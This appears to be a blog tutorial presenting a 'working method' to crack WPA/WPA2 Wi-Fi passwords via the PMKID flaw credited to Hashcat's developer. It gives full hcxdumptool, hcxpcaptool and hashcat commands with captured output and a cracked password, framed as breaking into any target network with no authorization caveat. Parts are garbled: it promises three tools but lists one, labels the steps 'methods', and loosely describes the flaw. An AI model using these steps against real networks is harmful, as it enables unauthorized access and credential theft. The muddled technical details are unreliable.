How to Hack Wi-Fi Passwords Using New WPA/WPA2 Flaw (Working Method)

wi-fi
Technology

When it comes to the security of Wi-Fi networks, it’s well known in the circles of network security professionals that some major vulnerabilities that made them vulnerable to hack attacks have always existed. The KRACK attack was unarguably the most infamous Wi-Fi hacking mechanism utilizing one such vulnerability of Wi-Fi protocol. However, as time passed many of those vulnerabilities were fixed by the Wi-Fi alliance and hardware manufacturers, and therefore the hacking methods relying on them stopped working. Now it turns out that one more vulnerability has been discovered in Wi-Fi protocol that can allow hacking of both WPA and WPA2 protected networks. Let’s have a look at it.

The new WPA/WPA2 flaw

The flaw that makes this hacking possible is a new one. It has been discovered by the lead developer of Hashcat password recovery tool Jens ‘atom’ Steube. He discovered it accidentally while checking the upcoming WPA3 Wi-Fi protocol for possible loopholes. The flaw doesn’t require a complete 4-way handshake of EAPOL network. Instead, it relies on Robust Security Network Information Element (RSN IE) of a single EAPOL frame. From there it extracts a pre-shared key (PSK) login password and allows you to log on to the network with that password.

The difference between old and new method

According to Steube there’s a major difference between old hacking methods and this new method. While old methods required the user of Wi-Fi network to be logged on to the network, this new method eliminates that requirement. It can work even if no one is logged on to the network. As long as network is available, it will work. 

Things you need

Before we get started you’ll have to download the following tools from their own respective links:

  • HCXDumpTool (version 4.2 or higher): This is a tool that can capture packets from WLAN devices. Download the entire folder as a ZIP file. 

Once you’ve downloaded all 3 of them you’re good to go. Let’s get started:

The steps for hacking a Wi-Fi password using new method

Given below are the steps to hack the password of any Wi-Fi router using the latest WPA/WPA2 flaw:

METHOD 1: First of all let’s use the HCXXDumpTool to obtain the PMKID of target network. The PMKID will then be used to steal the password of that network. Just execute the following command:

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

This will lead to an output like this:

start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

If target network accepts your association request, you’ll receive a message saying “FOUND PMKID” like shown below:

[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

Depending on the nature of the network this may take some time. Steube recommends allowing the command to run for at least 10 minutes before aborting.

METHOD 2: Now dump the received frame into a file (in ‘pcapng’ format).
METHOD 3: Now with help of hcxpcaptool convert the received frame into a hash format. Execute the following command:

$ ./hcxpcaptool -z test.16800 test.pcapng

You’ll get an output like this:

start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800

Now you’ll see the hashed output in written file. The content of that file will look like this:

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

METHOD 4: Now run Hashcat to derive the pre-shared key from this hashed PMKID. Execute the following command :

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

The output will look like this:

hashcat (v4.2.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
Time.Started.....: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated...: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*.....:  1641.3 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 66846720/308915776 (21.64%)
Rejected.........: 0/66846720 (0.00%)
Restore.Point....: 0/11881376 (0.00%)
Candidates.#1....: hariert! -> hhzkzet!
Candidates.#2....: hdtivst! -> hzxkbnt!
Candidates.#3....: gnxpwet! -> gwqivst!
Candidates.#4....: gxhcddt! -> grjmrut!
HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018

And that’s it. You’ve successfully hacked the target network, and now you can start browsing on it. The hack is expected to work against all 802.11 i/p/q/r networks, though this claim has not been verified yet. You give it a try and let us know in the comments whether it works or not.

The Run Time is a well-known media platform where you can find all solutions related to business, life, fashion, technology, travel, education, etc. Our tips and tricks can help you get solutions for challenges.